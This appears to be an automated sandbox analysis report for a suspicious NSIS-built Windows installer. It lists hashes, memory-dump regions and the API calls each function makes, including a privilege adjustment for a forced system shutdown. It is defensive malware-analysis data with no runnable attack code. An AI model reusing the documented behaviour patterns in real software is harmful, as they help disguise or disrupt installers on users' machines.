                                        • Opcode ID: 48a3b97eb8f4323b2d8289913e655ff9c40a6523b1035e1ec8d6a05447a138b6
                                        • Instruction ID: 6d5e15c1a0cb12e9fb69ac90aa40b4d17cae54031dd3d93f2523cff5c625aa4a
                                        • Opcode Fuzzy Hash: 48a3b97eb8f4323b2d8289913e655ff9c40a6523b1035e1ec8d6a05447a138b6
                                        • Instruction Fuzzy Hash: 95016D75B005200BFB249A7DC854B6BB3EADBCA760F10883AE94EC7354EA65DC024791
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12fd0569625f6073e9626daaa05dfa0b430883698ca7229deab58f262238416c
                                        • Instruction ID: 04082b2828f1667c75f223cb3d49da935409c0cbf517e32b3427ae56812df85d
                                        • Opcode Fuzzy Hash: 12fd0569625f6073e9626daaa05dfa0b430883698ca7229deab58f262238416c
                                        • Instruction Fuzzy Hash: E2017C76B002645BEF699A6CC8247FF76AAABCE350F404139D906E7248EE64DC4287D1
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54dacb56985a08916fa2208f2823e58f2636ef25b5a89aa4c6eb5bee69a08b87
                                        • Instruction ID: d13f8954ca31664072ecd1ce27bc715eb56b11b801fbf8b65838815703147aed
                                        • Opcode Fuzzy Hash: 54dacb56985a08916fa2208f2823e58f2636ef25b5a89aa4c6eb5bee69a08b87
                                        • Instruction Fuzzy Hash: 6901BC347005244FFB21DA7CD860B6E77E6EB8A3A0F104838F90AC7250EA21DC4287C1
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4ac2ea5ffc1bde9519110964c1a3ee5bf9f57631d45c2af395f2994c5e86dbd
                                        • Instruction ID: 0639029834370ccfc9ff4672980e58bc60169acd4f3b3d89d50e86404b0948f5
                                        • Opcode Fuzzy Hash: c4ac2ea5ffc1bde9519110964c1a3ee5bf9f57631d45c2af395f2994c5e86dbd
                                        • Instruction Fuzzy Hash: A601AF797005200BEB65A6BDC45572E73E6EBCA7A0F148839E90AE7344EE29DC038795
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a72696ee0fb46eebc83cc7496b2d0842a251818820f734e5528266bbe895d5bc
                                        • Instruction ID: 3f5c2a0a45718c1a9a34c049b542509c33131570c0d019b67396acd4486ffcb6
                                        • Opcode Fuzzy Hash: a72696ee0fb46eebc83cc7496b2d0842a251818820f734e5528266bbe895d5bc
                                        • Instruction Fuzzy Hash: 6901A4747005244FFB20DA7CD850B2E73E6EB8A760F108438F90AC7350EA25DC4287C1
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9cefbc2797238d7e802823625b3734f1cc19b1d129adc58b859c4fc791f2c43c
                                        • Instruction ID: f5d21c0ef531c12e79a14e6dea11c55d48d00a36f66a606c17faaf8252ee60ed
                                        • Opcode Fuzzy Hash: 9cefbc2797238d7e802823625b3734f1cc19b1d129adc58b859c4fc791f2c43c
                                        • Instruction Fuzzy Hash: C601F931F10224D7EF259A75D88169E7B76E789350F104439E905EB341DB31DC02CB80
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136487703.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 786a8eb48a7577c33554518c102e5c10ea78fbe22b6beb0a019d2a365951c980
                                        • Instruction ID: 27ff81eaed94feae8b1e2aaaae69485571e399d275c44919d161ce9e760d19d2
                                        • Opcode Fuzzy Hash: 786a8eb48a7577c33554518c102e5c10ea78fbe22b6beb0a019d2a365951c980
                                        • Instruction Fuzzy Hash: 8101F271A04254DECB01EBB9881036E7BB29F45302F2044AED925DF252F732CA4ACB81
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136487703.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 187d9d8ddbe56bd0b515576355342961076838731e789bcd497ac8397d424b33
                                        • Instruction ID: 3684d4093dbaf83a58596d41316fe2f9da38deab9683141e08f0d65d9ed14b8d
                                        • Opcode Fuzzy Hash: 187d9d8ddbe56bd0b515576355342961076838731e789bcd497ac8397d424b33
                                        • Instruction Fuzzy Hash: 38F08C35B001188FDF14CBA8D844BDEB7F1FF88322F148161F929AB2D4C6349A158BA0
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136487703.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef9c62ca6f3cfd407f96520d5cfb452c16289ca06aaa0e2de49afdca6d026aea
                                        • Instruction ID: 7cf36cc6ddf6f107146b870305b02196f38f7be418177d483330ad9d617db028
                                        • Opcode Fuzzy Hash: ef9c62ca6f3cfd407f96520d5cfb452c16289ca06aaa0e2de49afdca6d026aea
                                        • Instruction Fuzzy Hash: EEF0E9763002187B9F056E9C98119AF3BABEBC8320B00802AF919D7201DF314D2197A0
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f7e580cea68c41dfc94475e289720e447bd85f3f83374c512ffb1d2b141eea60
                                        • Instruction ID: 98b23d07e689e820696c241913af4784312966bdd9e6f828b8321077db837d57
                                        • Opcode Fuzzy Hash: f7e580cea68c41dfc94475e289720e447bd85f3f83374c512ffb1d2b141eea60
                                        • Instruction Fuzzy Hash: 80F0A77AE103298BFF309569C81579EB7BAE755371F104836E90AE7240D635E805C7D2
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136487703.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 374ad48f289d255a428a75abb0a1f24328b93db1552d0811a624259e896b7fcc
                                        • Instruction ID: 45418dc4472d5c8c94ab1059af0f8bdb29a52c98beb97ca2628e2e71e23d90f2
                                        • Opcode Fuzzy Hash: 374ad48f289d255a428a75abb0a1f24328b93db1552d0811a624259e896b7fcc
                                        • Instruction Fuzzy Hash: 5EE06D72E10215DFCB44DFB899452EE7BF5AB48311F1188AAD91DFB204E330CB658B90
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136487703.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b1e6d34c092de081682e0667181e152fadc8f507242c38bbdaaa4c4e5480ab9
                                        • Instruction ID: d4124a004a37aabcaa887661c8433d3d72958e85e6b7ed10c02cff9d9d921c3b
                                        • Opcode Fuzzy Hash: 7b1e6d34c092de081682e0667181e152fadc8f507242c38bbdaaa4c4e5480ab9
                                        • Instruction Fuzzy Hash: 68E01A71E002299BCB54EAB998052AE7AF9EB48351F108475D919E7200E774CA148B91
                                        APIs
                                        • SetErrorMode.KERNEL32(00008001), ref: 004033FB
                                        • GetVersionExA.KERNEL32(?), ref: 00403424
                                        • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                        • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                                        • OleInitialize.OLE32(00000000), ref: 00403548
                                        • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                                        • GetCommandLineA.KERNEL32(0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                                        • CharNextA.USER32(00000000,00435000,00000020,00435000,00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                                        • GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                                        • GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                                        • lstrcatA.KERNEL32(00436400,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                                        • GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                                        • lstrcatA.KERNEL32(00436400,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                                        • SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                                        • SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,00000008,0000000A,0000000C), ref: 00403700
                                        • DeleteFileA.KERNEL32(00436000,?,00000008,0000000A,0000000C), ref: 00403714
                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
                                        • ExitProcess.KERNEL32 ref: 004037E0
                                        • lstrlenA.KERNEL32(00436400,00435000,00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                                        • wsprintfA.USER32 ref: 00403846
                                        • GetFileAttributesA.KERNEL32(00431400,00436400,00431400,?,0000000C), ref: 00403878
                                        • DeleteFileA.KERNEL32(00431400), ref: 00403884
                                        • SetCurrentDirectoryA.KERNEL32(00436400,00436400,00431400,?,0000000C), ref: 004038B0
                                        • CopyFileA.KERNEL32(00436C00,00431400,?), ref: 004038C6
                                        • CloseHandle.KERNEL32(00000000,00431800,00431800,?,00431400,00000000), ref: 00403919
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                        • ExitProcess.KERNEL32 ref: 004039B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                        • String ID: "$A$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K|u$~nsu%X.tmp
                                        • API String ID: 2956269667-1389777410
                                        • Opcode ID: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
                                        • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                        • Opcode Fuzzy Hash: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
                                        • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E
                                        APIs
                                        • DeleteFileA.KERNEL32(?,?,757B3410,00436400,00435000), ref: 00405A78
                                        • lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,?,757B3410,00436400,00435000), ref: 00405AC0
                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B490,?,?,757B3410,00436400,00435000), ref: 00405AE1
                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B490,?,?,757B3410,00436400,00435000), ref: 00405AE7
                                        • FindFirstFileA.KERNEL32(0042B490,?,?,?,0040A014,?,0042B490,?,?,757B3410,00436400,00435000), ref: 00405AF8
                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                        • FindClose.KERNEL32(00000000), ref: 00405BB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2035342205-1173974218
                                        • Opcode ID: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
                                        • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                        • Opcode Fuzzy Hash: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
                                        • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                        • API String ID: 0-1298971921
                                        • Opcode ID: 6d32a431ca03db00f1c320f6db7e55fbb9fcb4fe18a64a40f228165406688123
                                        • Instruction ID: a99d4f8bd9f6470cd248e691108ad0560cc5e152d1f9ef103f56a8a3b7e1d0fc
                                        • Opcode Fuzzy Hash: 6d32a431ca03db00f1c320f6db7e55fbb9fcb4fe18a64a40f228165406688123
                                        • Instruction Fuzzy Hash: F8123B74E00319CFEB64DBA9C854BADB7B2FF89310F608569D809AB255DB309D42CF51
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                        • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                        • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                                        • DeleteObject.GDI32(00000110), ref: 00404E33
                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                          • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,?,00404192), ref: 00404370
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                                        • ShowWindow.USER32(?,00000005), ref: 00404F94
                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                        • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                        • GlobalFree.KERNEL32(?), ref: 00405172
                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                        • InvalidateRect.USER32(?,00000000,?), ref: 004052CE
                                        • ShowWindow.USER32(?,00000000), ref: 0040531C
                                        • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                        • ShowWindow.USER32(00000000), ref: 0040532E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: f11250b3fb3f61882aa354a54652fc5f201eb5c666114b29f2145b9c808ef288
                                        • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                        • Opcode Fuzzy Hash: f11250b3fb3f61882aa354a54652fc5f201eb5c666114b29f2145b9c808ef288
                                        • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                        • GetClientRect.USER32(?,?), ref: 004055BA
                                        • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                        • ShowWindow.USER32(?,00000008), ref: 0040565D
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                        • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                          • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,?,00404192), ref: 00404370
                                        • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                        • CloseHandle.KERNEL32(00000000), ref: 004056E4
                                        • ShowWindow.USER32(00000000), ref: 00405707
                                        • ShowWindow.USER32(?,00000008), ref: 0040570E
                                        • ShowWindow.USER32(00000008), ref: 00405754
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                        • CreatePopupMenu.USER32 ref: 00405799
                                        • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004057AE
                                        • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                        • OpenClipboard.USER32(00000000), ref: 00405833
                                        • EmptyClipboard.USER32 ref: 00405839
                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                        • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                        • SetClipboardData.USER32(?,00000000), ref: 00405884
                                        • CloseClipboard.USER32 ref: 0040588A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID:
                                        • API String ID: 590372296-0
                                        • Opcode ID: 78ad6a42e6b7779d9936bbd3c7a2519bba8c6928c53ce4858c467149458cc8c2
                                        • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                        • Opcode Fuzzy Hash: 78ad6a42e6b7779d9936bbd3c7a2519bba8c6928c53ce4858c467149458cc8c2
                                        • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                        • ShowWindow.USER32(?), ref: 00403E8F
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                                        • ShowWindow.USER32(?,00000004), ref: 00403EBA
                                        • DestroyWindow.USER32 ref: 00403ECE
                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                        • GetDlgItem.USER32(?,?), ref: 00403F06
                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                        • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                        • GetDlgItem.USER32(?,?), ref: 00403FCC
                                        • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                        • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00404041
                                        • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                        • ShowWindow.USER32(00000000,?), ref: 00404108
                                        • EnableWindow.USER32(?,?), ref: 0040411A
                                        • EnableWindow.USER32(?,?), ref: 00404135
                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040414B
                                        • EnableMenuItem.USER32(00000000), ref: 00404152
                                        • SendMessageA.USER32(?,000000F4,00000000,?), ref: 0040416A
                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                        • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                        • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                        • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                        • String ID:
                                        • API String ID: 1860320154-0
                                        • Opcode ID: bb6cbcf9a1c545d3154f604be3372cfdd7ba41936c4c4c21433e3a1b8f36b1fe
                                        • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                        • Opcode Fuzzy Hash: bb6cbcf9a1c545d3154f604be3372cfdd7ba41936c4c4c21433e3a1b8f36b1fe
                                        • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D
                                        APIs
                                          • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                          • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                        • lstrcatA.KERNEL32(00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,757B3410,00436400,?,00435000,0000000A,0000000C), ref: 00403B11
                                        • lstrlenA.KERNEL32(0042DFC0,?,?,?,0042DFC0,00000000,00435400,00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,757B3410), ref: 00403B86
                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                        • GetFileAttributesA.KERNEL32(0042DFC0,?,00435000,0000000A,0000000C), ref: 00403BA4
                                        • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,00435400), ref: 00403BED
                                          • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                        • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                        • ShowWindow.USER32(00000005,00000000,?,00435000,0000000A,0000000C), ref: 00403CAD
                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                        • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                        • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                        • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
